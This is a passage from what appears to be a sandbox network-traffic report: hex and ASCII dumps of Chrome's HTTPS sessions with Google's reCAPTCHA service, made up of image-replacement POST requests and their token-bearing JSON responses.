                                                                                                                          Data Ascii: E[^ cC~kJYP/'5Wvs%JdO5[y&>q<4}I2GcOefFbeVvg6V&23#x8HOhB'h=:u-i'sZ#?gM_xV3#zG;bIKL6FC;b
                                                                                                                          2024-12-19 16:08:23 UTC1390INData Raw: d5 ad 19 36 f9 10 da 3f 2d 2e 77 02 18 ee d9 c8 dd 81 93 c0 e9 4d 1a 65 a3 c2 e2 d8 49 0b a3 93 25 b4 8e 46 e0 0f 25 5f 38 c8 23 23 38 3d b2 dc e1 4d fb 97 8e ff 00 d7 e2 39 45 c5 26 9a 69 ff 00 5d 3f e1 bc ce ae 6f 88 28 84 04 d2 bc d0 a0 99 5b ed 21 55 31 d3 1f 2e 48 ea 7a 0a a5 ff 00 0b 50 28 8f 6e 83 bd 5c 6e 24 5d fd d5 c7 27 ee 63 8c 7f 2f 5a e1 35 79 ee a1 59 2c e7 8a 5d db 84 32 a4 b9 50 71 d1 7a 1c 01 bb db f4 aa 70 e6 48 a4 82 49 81 77 75 77 24 6e 21 40 c6 70 4e 3f 96 49 f6 c5 28 29 46 37 99 8d e5 29 e9 74 8f 51 3f 14 15 51 5d 34 5c 7c bb 98 c9 77 b7 62 fa 9c 21 eb ce 07 7c 55 9f f8 59 0b e5 3b 8d 21 9c ab 01 b5 27 2c 71 df 1f 27 38 f4 af 2a 82 6b 64 ba 2c d2 b6 e4 43 b9 5a 11 b5 09 2d d7 39 e3 e6 1d 32 7a f4 ab 96 bf 69 92 77 95 56 36 8c a0 46
                                                                                                                          Data Ascii: 6?-.wMeI%F%_8##8=M9E&i]?o([!U1.HzP(n\n$]'c/Z5yY,]2PqzpHIwuw$n!@pN?I()F7)tQ?Q]4\|wb!|UY;!',q'8*kd,CZ-92ziwV6F
                                                                                                                          2024-12-19 16:08:23 UTC1390INData Raw: 95 6f be 38 88 12 18 d7 2e 57 20 67 8e 0b 6d cf 52 3e 61 c9 cd 4d 6c f6 d1 b8 6f b1 5b c4 88 08 79 13 0c 14 0c 03 8e 01 ea 7f 20 4f b5 5e 11 cd e6 b0 f2 59 24 f3 8a b0 13 80 36 8c 01 ee 7a 31 e4 7a fd 28 9a ce 10 d1 c8 b1 f9 a3 ef a1 2b c1 27 04 2e d1 9d 80 1e 7a ff 00 11 1d 31 5b fb 3a 69 d9 ae 9f 77 f5 d0 c3 db 4f 6b ea fb 6a fe ef eb f3 2b bd cc 8a 1f cc 8d 14 c4 c0 48 04 80 95 07 18 6c 01 c8 e4 e3 1d 71 51 cb 71 22 48 d1 3a 22 3a 80 58 4b 20 40 3e f6 46 7b 1e 06 3d 73 9e 00 cd 5e 5b 45 92 60 b1 ab 79 9f 31 5f 97 39 24 36 08 23 b7 19 c1 27 03 07 39 35 22 c4 f0 a6 e9 ad 95 70 ec cc c4 e5 46 57 3f 37 40 49 5d a4 f2 30 01 a4 e9 d3 5a f2 fe 3f d7 f9 eb e4 5a ad 3d 3f af eb fa 57 33 16 74 96 47 8d 21 40 ca a5 be 63 ce d0 40 c9 f4 eb f8 55 4d 57 4e 86 fa 36
                                                                                                                          Data Ascii: o8.W gmR>aMlo[y O^Y$6z1z(+'.z1[:iwOkj+HlqQq"H:":XK @>F{=s^[E`y1_9$6#'95"pFW?7@I]0Z?Z=?W3tG!@c@UMWN6


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.1649759172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:30 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 5900
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://www.google.com
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:30 UTC5900OUTData Raw: 76 3d 6e 68 61 6d 68 66 41 36 6e 5f 68 4b 4d 61 5f 59 37 55 70 46 79 41 33 37 26 63 3d 30 33 41 46 63 57 65 41 35 7a 6f 44 48 42 6d 4c 76 6a 72 53 45 30 7a 49 49 6d 72 4a 58 46 5a 76 65 56 71 64 37 31 56 73 79 70 49 54 55 4d 51 52 4e 31 6f 35 56 50 58 58 78 4f 74 53 46 6d 6b 58 33 78 72 52 62 70 67 57 69 4a 4b 4f 2d 66 42 4a 6e 41 4a 30 2d 56 50 6c 6e 6d 4c 71 43 73 30 49 58 77 43 6e 4d 57 6c 67 62 48 58 32 76 54 55 6b 38 47 4c 74 52 58 74 6a 68 6e 2d 36 2d 5a 67 66 4a 68 68 54 4d 75 69 4e 67 31 4f 78 47 53 5f 71 4d 63 42 57 46 39 56 66 6f 77 50 4c 68 64 6c 34 46 56 6a 6a 35 76 79 6d 51 78 51 75 4d 38 43 66 71 7a 42 39 41 55 55 6f 78 62 58 6c 70 6e 64 46 5f 6a 30 6e 77 54 65 49 46 64 64 32 6d 62 74 51 6c 63 6e 56 73 39 39 63 62 66 4d 5a 68 38 33 55 46 4c
                                                                                                                          Data Ascii: v=nhamhfA6n_hKMa_Y7UpFyA37&c=03AFcWeA5zoDHBmLvjrSE0zIImrJXFZveVqd71VsypITUMQRN1o5VPXXxOtSFmkX3xrRbpgWiJKO-fBJnAJ0-VPlnmLqCs0IXwCnMWlgbHX2vTUk8GLtRXtjhn-6-ZgfJhhTMuiNg1OxGS_qMcBWF9VfowPLhdl4FVjj5vymQxQuM8CfqzB9AUUoxbXlpndF_j0nwTeIFdd2mbtQlcnVs99cbfMZh83UFL
                                                                                                                          2024-12-19 16:08:31 UTC670INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:31 GMT
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:31 UTC720INData Raw: 31 37 66 61 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 34 34 59 31 36 50 4c 5f 67 6b 69 70 5f 35 57 52 36 33 71 6b 49 69 41 6e 5a 36 43 58 4e 70 56 64 48 38 35 32 4f 4d 34 6d 51 7a 4c 6e 75 72 73 70 7a 49 43 64 6c 65 52 73 53 31 54 35 51 5a 74 43 72 67 4d 69 74 44 59 50 4e 44 39 39 4d 48 76 65 4b 51 38 48 2d 76 32 35 53 79 51 58 32 74 67 67 63 65 4c 2d 77 73 6f 66 6a 34 6e 65 68 43 5f 5f 57 57 44 46 69 66 56 6d 58 75 70 71 41 76 74 58 5a 6f 4d 5f 31 37 2d 63 68 5a 46 74 4e 7a 7a 6d 4f 45 75 43 34 34 71 4a 4e 48 70 53 71 6e 4c 39 62 4b 43 75 58 55 4f 54 76 4b 30 68 37 70 64 77 69 74 6e 7a 61 33 36 69 53 49 32 63 6d 68 63 6b 32 5f 79 65 43 43 2d 5a 34 33 4f 52 49 4c 6a 54 7a 48 30 63 5a 45 61 77 5f 6b 33 4a 62 74 54 6c 50 6a
                                                                                                                          Data Ascii: 17fa)]}'["dresp","03AFcWeA44Y16PL_gkip_5WR63qkIiAnZ6CXNpVdH852OM4mQzLnurspzICdleRsS1T5QZtCrgMitDYPND99MHveKQ8H-v25SyQX2tggceL-wsofj4nehC__WWDFifVmXupqAvtXZoM_17-chZFtNzzmOEuC44qJNHpSqnL9bKCuXUOTvK0h7pdwitnza36iSI2cmhck2_yeCC-Z43ORILjTzH0cZEaw_k3JbtTlPj
                                                                                                                          2024-12-19 16:08:31 UTC1390INData Raw: 35 5a 46 7a 69 32 4c 74 4c 63 6a 66 45 58 6e 5f 59 34 57 76 78 68 65 43 64 77 64 41 74 68 37 74 49 65 45 77 43 6d 65 38 58 76 64 51 45 6f 4d 34 6a 37 79 76 34 62 47 56 71 32 53 6b 31 56 75 4a 59 48 6a 45 70 6f 61 39 70 74 55 57 52 71 6d 33 69 77 4f 55 48 50 6f 55 6e 6f 69 38 32 2d 56 75 32 65 2d 5f 35 57 5a 35 49 65 47 32 37 50 6e 79 46 77 4f 50 34 37 49 48 78 55 78 36 34 50 73 74 42 55 45 49 72 44 35 57 44 6b 71 55 64 52 37 77 46 49 67 39 78 65 63 62 4a 47 50 63 79 6a 50 48 48 46 36 36 4a 4c 38 6b 56 79 6c 7a 34 77 73 6d 50 42 31 48 41 46 5f 4b 64 6f 7a 4b 50 37 58 68 6a 7a 78 36 79 79 72 31 6a 62 58 59 35 73 69 77 74 5a 6a 51 6e 5a 46 68 55 76 76 73 42 57 44 7a 4d 36 34 5f 45 64 55 50 54 4b 79 46 63 75 4f 66 58 53 57 73 32 4f 5a 71 50 77 74 68 67 31 30
                                                                                                                          Data Ascii: 5ZFzi2LtLcjfEXn_Y4WvxheCdwdAth7tIeEwCme8XvdQEoM4j7yv4bGVq2Sk1VuJYHjEpoa9ptUWRqm3iwOUHPoUnoi82-Vu2e-_5WZ5IeG27PnyFwOP47IHxUx64PstBUEIrD5WDkqUdR7wFIg9xecbJGPcyjPHHF66JL8kVylz4wsmPB1HAF_KdozKP7Xhjzx6yyr1jbXY5siwtZjQnZFhUvvsBWDzM64_EdUPTKyFcuOfXSWs2OZqPwthg10
                                                                                                                          2024-12-19 16:08:31 UTC1390INData Raw: 41 61 4d 41 6d 76 58 71 34 6a 6e 35 6d 73 46 57 52 45 49 73 48 49 76 6e 4d 33 34 4a 37 6e 30 78 45 2d 6b 73 57 6e 77 54 6b 4a 2d 4a 7a 50 49 45 42 63 48 62 70 45 64 31 4a 48 59 76 4a 33 31 38 32 35 36 4b 43 49 69 44 4d 7a 35 59 5a 59 4c 50 46 41 45 4f 6a 4f 56 31 63 76 55 6d 74 59 58 36 75 72 59 66 66 39 4c 44 46 58 30 67 4e 2d 6d 48 6d 38 52 37 79 4a 36 59 59 77 46 76 30 70 71 59 4f 38 56 51 66 54 57 78 47 2d 30 68 76 57 67 2d 52 78 49 35 73 6d 2d 36 73 50 61 33 39 31 6e 72 66 47 61 4c 67 6e 69 54 55 63 4b 77 61 4b 45 78 6b 55 62 31 6b 74 52 35 65 51 5f 76 30 4f 50 43 76 6e 50 4b 4a 66 37 41 51 72 69 56 2d 57 52 66 73 2d 43 77 6a 68 46 4c 41 69 4d 46 42 54 31 6e 4e 37 62 46 31 6a 48 53 76 6f 51 61 69 62 49 76 73 61 57 6d 32 4c 51 54 47 51 33 34 56 38 63
                                                                                                                          Data Ascii: AaMAmvXq4jn5msFWREIsHIvnM34J7n0xE-ksWnwTkJ-JzPIEBcHbpEd1JHYvJ318256KCIiDMz5YZYLPFAEOjOV1cvUmtYX6urYff9LDFX0gN-mHm8R7yJ6YYwFv0pqYO8VQfTWxG-0hvWg-RxI5sm-6sPa391nrfGaLgniTUcKwaKExkUb1ktR5eQ_v0OPCvnPKJf7AQriV-WRfs-CwjhFLAiMFBT1nN7bF1jHSvoQaibIvsaWm2LQTGQ34V8c
                                                                                                                          2024-12-19 16:08:31 UTC1390INData Raw: 39 61 6c 4f 59 56 4c 45 59 2d 70 70 2d 63 70 35 74 47 4c 50 6d 61 4f 35 6f 54 30 52 75 62 58 42 73 77 36 6f 30 42 34 4e 48 4a 32 30 53 47 58 6e 52 75 48 65 43 70 33 4d 6f 49 54 31 36 41 4d 36 35 4a 30 67 4a 4c 2d 6c 34 52 53 4a 57 48 44 46 67 33 61 33 4c 38 55 53 4b 73 76 59 61 65 57 32 54 5a 56 43 58 6a 37 36 63 4f 48 6e 71 66 6b 70 52 54 52 46 43 35 62 48 49 77 34 66 51 70 4e 4c 55 79 66 50 4e 54 39 2d 61 30 34 71 47 43 4f 65 45 52 6f 64 5a 2d 68 46 6a 4c 38 30 75 45 2d 55 5f 4f 6b 6d 68 51 45 39 49 4c 47 75 70 47 53 30 79 38 4c 6c 59 32 52 2d 38 6f 7a 48 50 68 54 38 71 66 4a 64 35 36 57 44 7a 74 76 42 78 6f 49 6e 33 6f 34 71 72 4d 79 49 6d 43 63 68 52 35 48 31 76 66 35 74 72 67 72 6d 35 4d 4a 70 31 42 46 53 73 65 31 41 56 7a 32 73 52 74 2d 62 35 46 4c
                                                                                                                          Data Ascii: 9alOYVLEY-pp-cp5tGLPmaO5oT0RubXBsw6o0B4NHJ20SGXnRuHeCp3MoIT16AM65J0gJL-l4RSJWHDFg3a3L8USKsvYaeW2TZVCXj76cOHnqfkpRTRFC5bHIw4fQpNLUyfPNT9-a04qGCOeERodZ-hFjL80uE-U_OkmhQE9ILGupGS0y8LlY2R-8ozHPhT8qfJd56WDztvBxoIn3o4qrMyImCchR5H1vf5trgrm5MJp1BFSse1AVz2sRt-b5FL
                                                                                                                          2024-12-19 16:08:31 UTC1256INData Raw: 30 49 2d 38 56 4a 32 41 64 6c 65 63 45 52 57 38 62 56 65 64 46 4f 54 45 6c 34 6a 4c 46 42 54 52 49 7a 35 6b 41 50 49 63 42 75 4b 75 50 46 71 73 76 43 34 56 73 41 4f 58 64 47 76 46 79 59 32 72 62 6f 63 35 77 76 70 79 49 4e 6b 6e 2d 34 6d 34 44 54 61 65 2d 73 4a 76 34 30 42 37 35 37 6c 75 53 35 5a 65 4a 5a 59 65 54 56 44 77 43 51 57 31 44 76 59 73 71 55 34 53 68 79 44 31 64 6d 74 55 47 68 32 63 62 67 76 38 4e 74 66 44 52 38 66 44 55 56 41 43 75 7a 6b 41 4d 75 6e 44 66 45 2d 74 2d 63 59 46 50 45 4a 61 69 67 66 30 55 46 32 34 72 62 33 37 71 44 50 57 31 4d 6a 5f 70 42 51 74 6d 4c 66 62 68 57 51 6d 76 50 6f 53 69 6c 74 68 73 4f 5f 57 47 70 4c 76 44 57 53 6b 62 4e 4f 61 49 77 75 48 4f 33 6c 59 75 6f 49 5a 62 39 38 64 30 72 41 59 4a 55 69 50 6a 6a 43 4e 6c 4f 32
                                                                                                                          Data Ascii: 0I-8VJ2AdlecERW8bVedFOTEl4jLFBTRIz5kAPIcBuKuPFqsvC4VsAOXdGvFyY2rboc5wvpyINkn-4m4DTae-sJv40B757luS5ZeJZYeTVDwCQW1DvYsqU4ShyD1dmtUGh2cbgv8NtfDR8fDUVACuzkAMunDfE-t-cYFPEJaigf0UF24rb37qDPW1Mj_pBQtmLfbhWQmvPoSilthsO_WGpLvDWSkbNOaIwuHO3lYuoIZb98d0rAYJUiPjjCNlO2
                                                                                                                          2024-12-19 16:08:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.1649761172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:33 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 5921
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://www.google.com
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:33 UTC5921OUTData Raw: 76 3d 6e 68 61 6d 68 66 41 36 6e 5f 68 4b 4d 61 5f 59 37 55 70 46 79 41 33 37 26 63 3d 30 33 41 46 63 57 65 41 34 34 59 31 36 50 4c 5f 67 6b 69 70 5f 35 57 52 36 33 71 6b 49 69 41 6e 5a 36 43 58 4e 70 56 64 48 38 35 32 4f 4d 34 6d 51 7a 4c 6e 75 72 73 70 7a 49 43 64 6c 65 52 73 53 31 54 35 51 5a 74 43 72 67 4d 69 74 44 59 50 4e 44 39 39 4d 48 76 65 4b 51 38 48 2d 76 32 35 53 79 51 58 32 74 67 67 63 65 4c 2d 77 73 6f 66 6a 34 6e 65 68 43 5f 5f 57 57 44 46 69 66 56 6d 58 75 70 71 41 76 74 58 5a 6f 4d 5f 31 37 2d 63 68 5a 46 74 4e 7a 7a 6d 4f 45 75 43 34 34 71 4a 4e 48 70 53 71 6e 4c 39 62 4b 43 75 58 55 4f 54 76 4b 30 68 37 70 64 77 69 74 6e 7a 61 33 36 69 53 49 32 63 6d 68 63 6b 32 5f 79 65 43 43 2d 5a 34 33 4f 52 49 4c 6a 54 7a 48 30 63 5a 45 61 77 5f 6b
                                                                                                                          Data Ascii: v=nhamhfA6n_hKMa_Y7UpFyA37&c=03AFcWeA44Y16PL_gkip_5WR63qkIiAnZ6CXNpVdH852OM4mQzLnurspzICdleRsS1T5QZtCrgMitDYPND99MHveKQ8H-v25SyQX2tggceL-wsofj4nehC__WWDFifVmXupqAvtXZoM_17-chZFtNzzmOEuC44qJNHpSqnL9bKCuXUOTvK0h7pdwitnza36iSI2cmhck2_yeCC-Z43ORILjTzH0cZEaw_k
                                                                                                                          2024-12-19 16:08:33 UTC670INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:33 GMT
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:33 UTC720INData Raw: 31 38 30 66 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 37 67 6d 67 5f 48 75 39 2d 2d 59 4a 55 4c 71 67 48 32 6d 65 68 77 39 5a 41 59 5a 63 57 51 68 65 4b 43 44 79 36 58 32 36 66 35 4d 72 6e 6d 65 6a 58 52 70 6b 65 70 61 73 2d 74 39 65 50 37 64 4a 42 30 79 4d 67 63 75 32 4d 4a 72 2d 5a 69 66 35 32 4a 36 6e 43 52 74 42 45 6c 38 4e 70 67 31 32 6e 78 43 41 71 73 66 45 52 6a 6c 73 31 48 30 5f 41 53 72 5f 5a 58 35 52 42 66 4c 53 34 61 48 54 61 4e 6f 73 70 4d 63 78 4d 66 4e 66 31 31 58 2d 69 5a 31 56 6f 36 55 53 67 35 79 50 2d 48 79 4c 4f 4f 33 34 58 5a 6d 75 44 52 55 62 62 38 59 4d 53 7a 44 6d 4c 65 41 73 5a 33 4f 58 38 43 66 4e 78 63 6d 35 58 48 68 36 2d 64 73 47 68 70 62 45 4f 32 7a 7a 56 47 6a 73 75 67 6d 6a 6b 34 58 43 6b 55
                                                                                                                          Data Ascii: 180f)]}'["dresp","03AFcWeA7gmg_Hu9--YJULqgH2mehw9ZAYZcWQheKCDy6X26f5MrnmejXRpkepas-t9eP7dJB0yMgcu2MJr-Zif52J6nCRtBEl8Npg12nxCAqsfERjls1H0_ASr_ZX5RBfLS4aHTaNospMcxMfNf11X-iZ1Vo6USg5yP-HyLOO34XZmuDRUbb8YMSzDmLeAsZ3OX8CfNxcm5XHh6-dsGhpbEO2zzVGjsugmjk4XCkU
                                                                                                                          2024-12-19 16:08:33 UTC1390INData Raw: 58 4b 33 4f 70 33 54 62 53 35 55 51 55 6f 6c 35 66 70 77 39 76 71 74 56 55 4b 33 79 75 30 58 66 61 43 61 46 70 69 6f 4d 31 2d 42 58 69 43 59 61 78 74 31 54 7a 54 78 6b 2d 6b 37 6d 6e 49 51 4b 33 30 56 45 68 38 65 69 31 59 69 7a 50 76 4a 35 51 30 2d 66 77 66 73 67 67 50 35 62 39 5f 47 4c 6b 6c 41 42 67 4c 4b 6d 66 31 42 71 6f 67 66 6e 67 36 2d 76 6e 38 4d 52 36 73 36 6c 64 42 53 4d 48 72 68 4e 4d 54 6f 79 64 43 35 6a 58 51 33 73 41 4d 4b 44 78 58 70 42 32 52 35 44 51 6d 4a 62 6e 51 55 4d 77 4f 7a 6c 6e 43 6a 52 36 52 38 71 2d 4b 31 71 77 67 63 35 48 66 39 73 47 53 54 66 73 35 61 4e 77 68 43 61 71 57 76 2d 35 4a 53 38 70 30 41 75 33 47 56 6b 62 69 5f 74 4e 53 37 7a 69 4b 4b 77 63 6d 61 68 71 69 75 54 68 56 76 78 58 5a 61 6b 55 64 67 70 77 77 43 6b 31 32 48
                                                                                                                          Data Ascii: XK3Op3TbS5UQUol5fpw9vqtVUK3yu0XfaCaFpioM1-BXiCYaxt1TzTxk-k7mnIQK30VEh8ei1YizPvJ5Q0-fwfsggP5b9_GLklABgLKmf1Bqogfng6-vn8MR6s6ldBSMHrhNMToydC5jXQ3sAMKDxXpB2R5DQmJbnQUMwOzlnCjR6R8q-K1qwgc5Hf9sGSTfs5aNwhCaqWv-5JS8p0Au3GVkbi_tNS7ziKKwcmahqiuThVvxXZakUdgpwwCk12H
                                                                                                                          2024-12-19 16:08:33 UTC1390INData Raw: 46 30 6b 63 79 43 68 71 67 4d 4b 7a 41 45 44 6a 76 6f 50 46 68 69 39 72 7a 46 6e 44 4b 46 59 72 38 4e 64 49 76 59 4f 6f 4f 51 79 31 65 32 4a 38 57 7a 52 35 43 36 78 61 4e 7a 79 55 37 49 47 41 78 71 55 4d 6e 5a 69 65 46 65 76 45 36 74 75 61 4e 37 63 39 57 33 2d 58 55 56 48 6b 31 50 2d 53 5f 54 7a 4b 61 32 59 63 68 68 56 77 62 30 4f 6a 71 59 33 4d 34 4b 55 55 41 4d 4b 6c 38 47 62 4f 36 49 72 31 62 6f 63 59 58 69 44 4f 65 56 7a 6b 71 46 73 43 56 44 46 31 47 41 5a 70 30 46 78 6f 50 53 58 39 70 53 66 44 74 54 5a 77 70 65 44 65 77 45 6f 62 53 7a 66 51 66 58 36 37 36 33 43 67 67 38 64 2d 4b 41 49 6b 44 72 51 71 5a 53 67 46 43 76 32 4e 42 31 5f 5a 38 37 61 57 50 55 63 71 5f 67 78 65 53 33 43 63 61 79 69 36 6c 71 44 61 31 76 78 74 50 42 62 65 77 57 51 4b 32 47 67
                                                                                                                          Data Ascii: F0kcyChqgMKzAEDjvoPFhi9rzFnDKFYr8NdIvYOoOQy1e2J8WzR5C6xaNzyU7IGAxqUMnZieFevE6tuaN7c9W3-XUVHk1P-S_TzKa2YchhVwb0OjqY3M4KUUAMKl8GbO6Ir1bocYXiDOeVzkqFsCVDF1GAZp0FxoPSX9pSfDtTZwpeDewEobSzfQfX6763Cgg8d-KAIkDrQqZSgFCv2NB1_Z87aWPUcq_gxeS3Ccayi6lqDa1vxtPBbewWQK2Gg
                                                                                                                          2024-12-19 16:08:33 UTC1390INData Raw: 35 52 49 51 57 67 51 57 70 50 58 47 4b 5f 50 78 75 52 4d 46 55 62 57 42 52 63 5f 39 66 6f 6c 65 63 62 67 55 53 43 72 41 55 76 72 50 6e 44 73 44 53 57 69 6f 72 35 32 42 53 45 54 42 42 78 46 38 58 56 55 61 31 51 58 6f 4a 6d 39 66 6c 45 42 4e 30 77 39 4c 6b 6b 54 33 4f 44 62 4b 49 64 4b 53 79 68 4c 46 34 4b 51 47 6a 56 68 42 6f 2d 4a 47 31 6d 66 39 74 5f 4d 7a 75 36 6e 32 33 66 45 53 79 54 6d 75 42 36 36 47 53 2d 47 38 53 52 41 55 30 4e 6a 4f 5f 4f 42 63 78 32 6c 31 33 6b 50 2d 78 75 56 39 53 6c 45 6f 4a 68 7a 39 47 4c 6a 39 42 46 78 43 43 4c 68 62 53 53 36 63 52 4d 6e 57 4f 44 37 52 74 5a 46 6f 51 47 41 64 64 41 38 65 58 4a 38 44 62 6d 62 47 74 4e 61 35 33 33 59 64 49 52 4c 33 77 68 58 4b 4f 50 35 33 67 49 78 76 68 73 65 64 7a 49 44 68 76 52 62 4d 32 4b 6f
                                                                                                                          Data Ascii: 5RIQWgQWpPXGK_PxuRMFUbWBRc_9folecbgUSCrAUvrPnDsDSWior52BSETBBxF8XVUa1QXoJm9flEBN0w9LkkT3ODbKIdKSyhLF4KQGjVhBo-JG1mf9t_Mzu6n23fESyTmuB66GS-G8SRAU0NjO_OBcx2l13kP-xuV9SlEoJhz9GLj9BFxCCLhbSS6cRMnWOD7RtZFoQGAddA8eXJ8DbmbGtNa533YdIRL3whXKOP53gIxvhsedzIDhvRbM2Ko
                                                                                                                          2024-12-19 16:08:33 UTC1277INData Raw: 62 43 4a 72 4e 4b 41 7a 58 56 69 52 66 33 32 4f 47 7a 79 62 47 37 4f 2d 42 6f 5f 74 54 55 6c 47 49 31 63 31 6a 47 55 32 7a 2d 71 73 4c 6b 44 50 51 49 63 77 4a 4c 53 4c 6a 55 62 64 6e 66 73 77 48 76 4d 39 64 52 4e 33 4e 52 4d 6b 51 70 36 69 49 53 50 6e 4a 53 35 41 71 42 51 67 43 32 6e 71 4a 73 55 6f 72 2d 64 56 68 45 62 54 61 56 67 45 49 70 36 6e 4a 31 4e 6c 65 53 30 4c 51 51 77 45 2d 41 7a 48 69 6f 4b 78 41 41 5a 74 41 57 64 37 35 4a 38 7a 61 52 68 61 6f 77 66 39 30 46 79 49 78 71 70 46 54 61 56 57 79 43 48 51 4e 74 4e 4e 57 69 65 6a 6e 71 54 4f 52 6b 6b 53 7a 55 6d 6d 2d 31 72 49 43 6a 76 65 65 6d 61 4f 6d 5a 6a 64 63 46 58 47 6d 71 56 31 50 62 65 6a 62 34 71 6c 5f 57 56 6f 65 46 49 6a 71 66 54 4b 6d 30 49 42 2d 4e 5f 68 6e 32 54 64 79 61 41 45 6e 32 53
